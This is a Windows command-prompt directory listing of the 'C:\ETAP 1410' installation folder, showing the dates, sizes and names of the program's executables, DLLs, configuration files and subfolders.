19/01/2016 02:31 589,824 PDEUtilities.dll
01/02/2016 11:14 3,760,128 Pegrp32E.dll
01/02/2016 11:14 24,576 PerfSol.Diagnostics.dll
26/02/2016 16:45 98,816 PlotCompare64.exe
26/02/2016 16:45 159,744 PlotFileReader.dll
26/02/2016 16:45 477,184 PlotManager.exe
01/02/2016 11:14 144 PlotManager.exe.config
01/02/2016 11:14 8,945 postaction.cgt
01/02/2016 11:14 6,767 precondition.cgt
19/01/2016 02:28 306,688 psedit.exe
26/02/2016 16:24 253,440 psevent.dll
26/02/2016 16:26 1,324,544 psgrid.exe
08/10/2010 13:20 16,384 psreport.dot
26/02/2016 16:25 189,440 psrept.exe
01/02/2016 11:14 223 psrept.exe.config
26/02/2016 16:25 60,928 pszip.exe
07/04/2016 11:41 <DIR> pvdt40
26/02/2016 16:25 125,952 QCPlot.dll
26/02/2016 16:39 148,480 qcplot64.dll
19/01/2016 02:36 201,216 ra.exe
07/12/2015 22:07 3,593,218 Readme.pdf
15/11/2002 10:51 13,755 Readme.wizard.xml
18/12/2007 13:10 99 RegETAP.BAT
08/10/2010 13:20 14,848 reporta4.dot
03/08/2000 04:50 1,056,768 ROBOEX32.DLL
07/04/2016 11:45 <DIR> Rules
19/01/2016 02:36 1,939,456 SC3Ph.exe
19/01/2016 02:35 5,971,968 scansi1p.exe
19/01/2016 02:36 5,232,640 scansi3p.exe
19/01/2016 02:35 6,535,168 SCGost1p.exe
19/01/2016 02:36 6,431,232 sciec1p.exe
19/01/2016 02:37 5,242,880 sciec3p.exe
19/01/2016 02:35 4,812,288 sciectr.exe
19/01/2016 02:37 5,063,680 scsource.exe
01/02/2016 11:14 21,020 search.avi
19/01/2016 02:36 7,451,648 SFA.exe
26/02/2016 16:38 32,768 ShellControl.dll
19/01/2016 02:32 1,114,112 SkmDataParserLib.dll
01/02/2016 11:14 77 SO.ini
19/01/2016 02:36 708,096 so3ph.exe
19/01/2016 02:34 752,640 stlf.exe
19/01/2016 02:35 5,911,040 svc.exe
01/02/2016 11:14 3,198,976 SX.dll
07/04/2016 11:41 <DIR> Symbols
07/04/2016 11:42 <DIR> SymbolsXaml
01/02/2016 11:14 1,081,344 SyncFusion.Chart.Base.dll
01/02/2016 11:14 602,112 SyncFusion.Chart.Windows.dll
01/02/2016 11:14 61,440 SyncFusion.Compression.Base.dll
01/02/2016 11:14 122,880 SyncFusion.Core.dll
01/02/2016 11:14 1,105,920 syncfusion.diagram.base.dll
01/02/2016 11:14 1,224,704 Syncfusion.Diagram.Windows.dll
01/02/2016 11:14 3,710,976 Syncfusion.DocIO.Base.dll
01/02/2016 11:14 16,384 SyncFusion.Grid.Base.dll
01/02/2016 11:14 16,384 SyncFusion.Grid.Grouping.Base.dll
01/02/2016 11:14 1,003,520 SyncFusion.Grid.Grouping.Windows.dll
01/02/2016 11:14 2,146,304 SyncFusion.Grid.Windows.dll
01/02/2016 11:14 94,208 SyncFusion.GridConverter.Windows.dll
01/02/2016 11:14 814,080 Syncfusion.GridHelperClasses.Windows.dll
01/02/2016 11:14 565,248 SyncFusion.Grouping.Base.dll
01/02/2016 11:14 192,512 SyncFusion.HTMLUI.Base.dll
01/02/2016 11:14 389,120 SyncFusion.HTMLUI.Windows.dll
01/02/2016 11:14 53,248 SyncFusion.Scripting.Base.dll
01/02/2016 11:14 131,072 SyncFusion.Scripting.Windows.dll
01/02/2016 11:14 4,055,040 SyncFusion.Shared.Base.dll
01/02/2016 11:14 26,112 SyncFusion.Shared.Windows.dll
01/02/2016 11:14 13,049,856 Syncfusion.Shared.Wpf.dll
01/02/2016 11:14 16,384 SyncFusion.Tools.Base.dll
01/02/2016 11:14 9,453,568 SyncFusion.Tools.Windows.dll
01/02/2016 11:14 4,284,416 SyncFusion.XlsIO.Base.dll
01/02/2016 11:14 7,090 syslogic.cgt
07/04/2016 11:41 <DIR> Tables
01/02/2016 11:14 8,700 tables.ecd
01/02/2016 11:14 389,120 tag.mdb
19/01/2016 02:31 172,032 tccconvert.dll
19/01/2016 02:31 516,608 tccimport.exe
19/01/2016 02:36 2,227,200 TDULF.exe
19/01/2016 02:31 205,824 TDUpdate.exe
01/02/2016 11:14 1,308,672 Telerik.Windows.Controls.Chart.dll
01/02/2016 11:14 3,068,928 Telerik.Windows.Controls.Charting.dll
01/02/2016 11:14 1,734,656 Telerik.Windows.Controls.Data.dll
01/02/2016 11:14 4,346,368 Telerik.Windows.Controls.DataVisualization.dll
01/02/2016 11:14 3,376,640 Telerik.Windows.Controls.dll
01/02/2016 11:14 876,032 Telerik.Windows.Controls.Docking.dll
01/02/2016 11:14 1,039,872 Telerik.Windows.Controls.Gauge.dll
01/02/2016 11:14 270,447 Telerik.Windows.Controls.Gauge.xml
01/02/2016 11:14 2,611,200 Telerik.Windows.Controls.GridView.dll
01/02/2016 11:14 2,254,336 Telerik.Windows.Controls.Input.dll
01/02/2016 11:14 2,712,576 Telerik.Windows.Controls.Navigation.dll
01/02/2016 11:14 1,668,096 Telerik.Windows.Controls.RibbonView.dll
01/02/2016 11:14 1,863,168 Telerik.Windows.Controls.ScheduleView.dll
01/02/2016 11:14 405,948 Telerik.Windows.Controls.xml
01/02/2016 11:14 453,632 Telerik.Windows.Data.dll
01/02/2016 11:14 248,444 Telerik.Windows.Data.xml
07/04/2016 11:41 <DIR> Themes
01/02/2016 11:14 56,320 TraceView.exe
19/01/2016 02:40 29,412,352 ts.exe
01/02/2016 11:14 63,488 u2lexpo.dll
01/02/2016 11:14 82,432 u2lsqrt.dll
01/02/2016 11:14 27,136 u2lstrng.dll
19/01/2016 02:34 71,680 UC.exe
26/02/2016 16:24 620,032 WCT32DR3.dll
26/02/2016 16:38 722,944 wct32dr364.dll
30/09/2015 14:48 45,843 WhatsNew_14.htm
12/11/2014 14:32 3,702 WorkPermitTemplate.xml
26/02/2016 16:25 492,032 WRT32DR3.dll
26/02/2016 16:39 592,384 wrt32dr364.dll
395 File(s) 992,689,139 bytes
19 Dir(s) 11,092,480,000 bytes free
C:\ETAP 1410>